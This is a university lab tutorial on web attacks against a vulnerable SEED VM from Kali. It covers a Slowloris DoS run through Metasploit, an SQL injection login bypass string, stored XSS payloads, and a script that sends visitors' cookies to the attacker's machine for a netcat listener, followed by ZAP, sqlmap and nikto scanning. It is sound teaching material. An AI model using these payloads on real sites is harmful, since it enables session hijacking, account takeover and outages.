CYS 7132 Tutorial # 7: Web Attacks

The purpose of this tutorial is to provide hands on experience with web application
attacks, which have been on the rise lately. Understanding how web hackers operate is
essential in order to design better defense.
Various web attack vectors will be illustrated. We will use Kali as the attack machine,
and the Seed VM as the target.

The steps to install and configure the SEED VM were provided in Tutorial #1.
The practice will focus on the following attack vectors: Slowloris DOS Web attack, SQL
Injection, Cross-Site Scripting (XSS) in Part1, and Password Cracking in Part 2.
The SEED VM provides some web applications that contain the corresponding
vulnerabilities. The task will consist of running the SEED VM, and launching the attacks
from Kali.

It is assumed that you’ve configured your SEED machine as suggested in the first
tutorial.

1. SEED VM Configuration
The steps to install and configure the SEED VM were provided in Tutorial #1.
The SEED VM provides web applications that contain different vulnerabilities. The task
will consist of running the SEED VM, and launching the attack from Kali. The
configuration steps for the tutorial are as follows:

Step 1: Get Target VM IP address

To access the target site, you need to configure the browser running on Kali by
specifying the IP address of the SEED VM.
In the Seed VM, open a command window (click on the red icon to the left), and get the
IP address using ifconfig:
In my setup, the IP is 192.168.219.101 (yours may be different).

Step 2: Update Hosts file in Kali

In Kali, open using leafpad the file hosts located under /etc (so type cd /etc, and then
leafpad hosts). The following will be displayed:

Add the following lines (in the red box), save and close the file.
 2. Web DOS Attacks
There are 2 main categories of web DOS attacks
1. Volumetric attacks, such as HTTP Flood attacks, which overload the target
website by submitting a large number of web requests for a sustained period of
time.
2. Slow and low attacks, such as Slowloris, which bring down the target by opening
and maintaining multiple simultaneous requests, without any further activity.
When the maximum number of concurrent sessions is reached, other legitimate
requesters will be prevented access.
You’ll try the Slowloris attack against one of the websites hosted on the SEED machine.
In the SEED machine, open a terminal, type ifconfig, and find out the IP address
connected to the same network as your Kali machine:
In the example above the IP address is 192.168.219.101 (yours may be different). If you
are not sure about the network, do the same in your Kali machine to find out the
corresponding IP:

My Kali VM is connected to the SEED machine through IP 192.168.219.102.

Now, in Kali, open a browser, and go the site http://www.xsslabelgg.com, as shown

below:
Bookmark the link, and leave the site, e.g. by going to google.com:

Open Metasploit, and search for an exploit for slowloris as shown below:

There is one exploit: auxiliary/dos/http/slowloris. Initialize the exploit by getting a

handle on it, and then display the exploit parameters as shown below:
Keep the default parameters, which by the way indicate that the attack will be against
port 80, which is where the web server runs. Set the target IP address, which is a
required parameter. Set the rhost parameter to the SEED IP address as follows:

Type run to execute the exploit as shown above. Wait for a few minutes (4 or 5 or
more):
While the attack is underway try to access again the site; you’ll see that the site is
inaccessible; so the DOS is successful:

Now stop the attack (typing Ctrl +C or exit) and check again; this time, the site should
load properly:

3. SQL Injection and XSS Attacks

3.1 SQL Injection Attack

The SQL Injection attack will be done against the site

http://www.seedlabsqlinjection.com
Open, a browser in Kali, and go to the site; the following be displayed (this assumes
that the SEED VM is also running):

One of the users is Alice. Assume that you don’t know her credentials, but would like sill
to access her account. Try to login with alice/1234

As you’ll notice, access will be denied because the credentials are wrong.
Now, try the following: use anything for password (e.g. 123456) and username: alice’ or
‘a’ = ‘a

You’ll see that access will be granted:

This is because the site is vulnerable to SQL injection.
Find out more about SQL injection, by downloading the description of the attack at
http://www.cis.syr.edu/~wedu/seed/Labs_16.04/Web/Web_SQL_Injection/Web_SQL_Inj
ection.pdf
There is also a video at: https://youtu.be/_P8HCLkDInA
Practice:
Perform the following tasks (Section 3, page 3):
1. Read: 3.1-Task 1: Get Familiar with SQL Statements
2. Read: the preamble for 3.2-Task 2: SQL Injection Attack on SELECT Statement

3.2 Cross-Site Scripting (XSS) Attack

The XSS attack will be done against the site http://www/xsslabelgg.com . In Kali, open a
browser, and go to the site:
Login into the account of Alice using as credentials: alice/seedalice

Select More>Members and add a few friends to Alice profile:

For instance, I’m adding Samy as a friend below:

After adding the friends, click on Account>Settings (on right top screen):
Click on Edit profile, and add under Brief Description (of Alice’s profile) the following
JavaScript code: <script>alert(‘hacked’)</script>
Save the Profile, by clicking the Save button at the bottom:

Now, logout from the account.

Assume, now that you are a new visitor to the site, and would like to view Alice’s public
profile. By clicking Alice, the following popup will be displayed:

By loading the page corresponding to the page, the JavaScript code which was
embedded has been executed. That’s the essence of XSS attack. Now, let’s increase
the sophistication by trying to fetch the cookie from the visitor’s browser. Login again
into Alice account, and add the following code to her profile:
<script>alert(document.cookie);</script>
Click Save.
Logout from the account. Once again, by clicking on Alice’s link, the following pop will
be displayed, which contains the cookie:

Cookies are important because they are used by many sites (e.g. banks) as second
factor authentication. By being able to collect them, hackers just need to know your
password to be able to login into your accounts. In practice, a hacker will not display the
cookie. Instead, he/she will capture the cookie and send it silently to a remote location
that is under their control. We will try to reproduce this scenario by sending the cookie to
the attack machine (i.e. Kali).
Find out the IP address of your Kali machine connected to the SEED VM. Open a
terminal in Kali, and type ifconfig:
In the above example, the IP address is 192.168.219.102.
Login into Alice’s account and add the following JavaScript code to her profile:
<script>document.write(’<img src=http://192.168.219.102:5000?c=’
+ escape(document.cookie) + ’ >’);
</script>
The above JavaScript code sends an HTTP request to the attacker’s machine (Kali) on
port 5000 (you can use a different port; e.g. 9000), with the cookies appended to the
request. The JavaScript code inserts an <img> tag with its src attribute set to the
attacker’s machine. When the JavaScript inserts the img tag, the browser tries to load
the image from the URL in the src field; this results in an HTTP GET request sent to the
attacker’s machine.
Make sure to replace in the code the IP address by your Kali IP.
After saving the profile, you can notice a broken image on Alice profile; this corresponds
to the injected JavaScript code.

Now, logout from Alice’s account.

To send the cookie to the attacker’s machine, we use the netcat program, which is
available in Kali. Netcat is a legitimate program used for various network admin tasks.
But it is also used by hackers to create backdoors and Trojan horses. Open a console in
Kali and type nc -h to list the netcat commands:
The "-l" option allows running netcat as a server that listens for a connection on the
specified port (e.g. port 5000). This server program basically prints out whatever is sent
by the client and sends to the client whatever is typed by the user running the server.
The attack scenario is that the hacker will infect the victim by sending a phishing link or
by compromising another site that the victim will visit. Then to collect the cookie, the
hacker will setup a netcat server that will listen for incoming messages sent by the client
(code used to infect the victim).
To set up the netcat server, type the following command:

Type return; the server will be waiting.

Next, go the site as a visitor and click on Alice’s profile:
The cookie will be captured and transferred to the netcat server as shown below:

The hacker can now collect the cookie and use it to impersonate the victim.
Find out more about XSS attacks by downloading the description of the attack at

https://websitesecuritystore.com/blog/what-is-cross-site-scripting-attack/

There is also a video at:

https://youtu.be/_P8HCLkDInA

Practice:

Perform the following tasks (Section 3, page 3):

1. Read: 3.1 Preparation: Getting Familiar with the "HTTP Header Live" tool

4. Using ZAP
ZAP is a web application a scanner, which allows scanning a website to identify
potential vulnerabilities that can further be exploited for attacks such as XSS, SQL
injection, etc.
ZAP is available in Kali and it is straightforward.
To start ZAP, go to Applications>Web Application Analysis>owasp-zap

You can decide to persist (save) the session or not:

Click Start. The ZAP panel will be displayed as follows:
Enter the target site in the test are (URL to attack). Enter the URL to
http://www.seedlabsqlinjection.com
Click Attack to start the scanning. The scanning some time dependent on the
complexity of the site.
At the end of the scan, the results will be displayed in the left bottom panel. You can
note below that 7 alerts have been generated. These correspond to potential
vulnerabilities categorized in different folders: XSS, directory browsing, SQL injection,
etc. By opening the folders, you’ll see a list of URLs which point to potentially vulnerable
pages.
For instance, we can see that there is one directory browsing vulnerability which points
to a directory called CSS. Directory traversal, also called path traversal, or directory
browsing attempts to access files and directories that are stored outside the web root
folder. The web root folder is the folder that contains the web pages and files that are
exposed to the public in a website. By manipulating variables that reference files with
“dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may
be possible to access arbitrary files and directories stored on file system including
application source code or configuration and critical system files.
By entering the URL in the browser, you can see that it points to a directory that in
principle is not supposed to be public.
 5. Other web scanners
A couple of other interesting web scanners are sqlmap and nitko,; both are available in
Kali.
Sqlmap
Sqlmap allows probing a target to gather information that can be used to conduct sql
injection attack against a target. automates the process of detecting and exploiting SQL
injection flaws and taking over of database servers. It can be used in batch or
interactive mode. The interactive mode is interesting as it allows guiding the scanner
and collecting specific information. Below is command for the interactive mode:
sqlmap -u “URL” --forms –crawl=2

For more command options, type sqlmap -h for the help.

Nikto
Nikto is a more general scanner which works like ZAP; it probes the target trying to find
exploitable vulnerabilities. It checks for dangerous files/programs, server configuration
items such as the presence of multiple index files, HTTP server options, and will attempt
to identify installed web servers and software. The basic command is:
nikto -h “URL”

For more command options, type nikto -Help for the help.

Summary
This tutorial session introduces web attack methods through two vulnerable web apps
running on the SEED VM. Part 2 will focus on web password cracking using a tool
called Burp suite.
Appendix: Installing Zap in Kali
Since v 2019.4, Zap is no more available by default on Kali.
To install ZAP, in Kali, open a browser and download ZAP:

Download Linux installer (save it in your Downloads directory):

After completion, you can check the presence of the file in the Downloads directory:
To execute the file, you need to assign it execute permission as follows:

Now, install the application as follows:

The following setup windows will popup:

Click Next
Review and accept the license agreement, and click Next:

Select Standard installation and click Next:

Click Install.

Click Finish.
To start ZAP, go to Applications (upper left corner) and search for ZAP: